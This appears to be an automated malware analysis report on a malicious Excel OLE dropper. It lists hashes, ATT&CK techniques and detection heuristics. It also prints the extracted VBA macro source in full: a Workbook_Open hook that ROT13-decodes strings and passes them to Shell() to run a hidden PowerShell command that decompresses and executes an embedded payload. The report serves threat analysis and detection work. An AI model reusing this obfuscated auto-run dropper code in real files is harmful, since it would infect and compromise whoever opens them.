Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1f23a246d4723c65…

MALICIOUS

Office (OLE)

99.0 KB Created: 2019-04-19 12:38:06 First seen: 2019-05-16
MD5: 6f023dbef727ad7dacd7bcb2234b5967 SHA-1: a1826d3103d5c3de9ecbdf0c68af9edfd3db9cee SHA-256: 1f23a246d4723c658e27f2175a2e4b075960e1df862a3d33f54364ee93f2d960
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains VBA macros, including a Workbook_Open event and a Shell() call, indicating it's designed to execute code upon opening. The extracted VBA script attempts to construct and execute commands using obfuscated strings, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6953410-0' further supports its role as a dropper.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6953410-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6953410-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2515 bytes
SHA-256: 6fe42b46df6ebff24d5e89becb4348e85f1c0651177fe5f5fd265403e26c8c41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Function DateCilly()
DateCilly = "jZVP   Cebprff  'pnyY'   ""pErNgR""  ""CbjreFURYy -RC  OlcNff -AbCEbS -abavagrEn -J 1  $V8T = [FgevAt][PuNe]34  ;Frg-Inevnoyr  ('P'+'OV') (  ([PUNE]44).GbFGEVAT() ) ;vRk( ""\"".(${V8T}{1}{0}${V8T}-s 'y'${POV}'fn') ('Rs') (${V8T}{0}{1}{3}{2}${V8T} -s'A'${POV}'Rj'${POV}'pG'${POV}'-bowR');( .('Rs')  (${V8T}{2}{3}{1}{4}{0}${V8T}-s'qRE'${POV}'ErnzE'${POV}'V'${POV}'B.Fg'${POV}'rN')((&('Rs') (${V8T}{1}{4}{5}{3}{8}{0}{6}{2}{7}${V8T} -s 'q'${POV}'vb.pB'${POV}'GeRN'${POV}'b'${POV}'ZCERF'${POV}'FV'${POV}'rSyNGrf'${POV}'z'${POV}'a.')( [VB.ZrZBeLFGERnZ][FlfgRz.PBaIREg]::${V8T}sEb`ZONfr6`4`F`GeVat${V8T}((${V"
End Function

Function Logocompany()
Logocompany = "BzcerfFVBa.pBzCERfFvbazbQr]::${V8T}qr`PbZc`ERfF${V8T} ) ) ${POV}[FLfgRz.grkG.rApBqVat]::${V8T}Nfp`vV${V8T})).${V8T}ER`NQgB`raq${V8T}()|. ( `${IRE`O`bFR`c`ErS`rErapR}.${V8T}gb`FG`EVaT${V8T}()[1${POV}3]+'k'-WbVA'')""\"" )"""
End Function


Sub Workbook_Open()
If hinttmessage > 79 Then Z# = R#: Shippingord Else Debug.Print: Application.Quit
End Sub
Function Shippingord()
EE = EX
If mfRTF > 0 Then seEE = (Shell#((ACTrep(DateCilly) & tetraa & ACTrep(Logocompany)), msoBalloonButtonCancel + 2))
End Function

Function tetraa()
For tt = 1 To 8
tetbb = tetbb + Cells(tt, 1)
Next tt
tetraa = tetbb
End Function

Function ACTrep(Test$) As String
  Dim tt As Long, x As Integer, y As Integer
  For tt = 1 To Len(Test$)
    y% = 0
    x% = Asc(Mid$(Test$, tt, 1))
    If (x% > 64 And x% < hinttmessage + 10) Or (x% > 96 And x% < 123) Then
      y% = 13
      x% = x% - y%
      If x% < hinttmessage + 16 And x% > hinttmessage + 2 Then x% = x% + 26 Else If x% < 65 Then x% = x% + 26
    End If
    Mid$(Test$, tt, 1) = Chr$(x%)
  Next tt
  ACTrep = Test$
End Function

Function hinttmessage()
hinttmessage = (((((((((((Application.International(xlDate))))))))))))
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True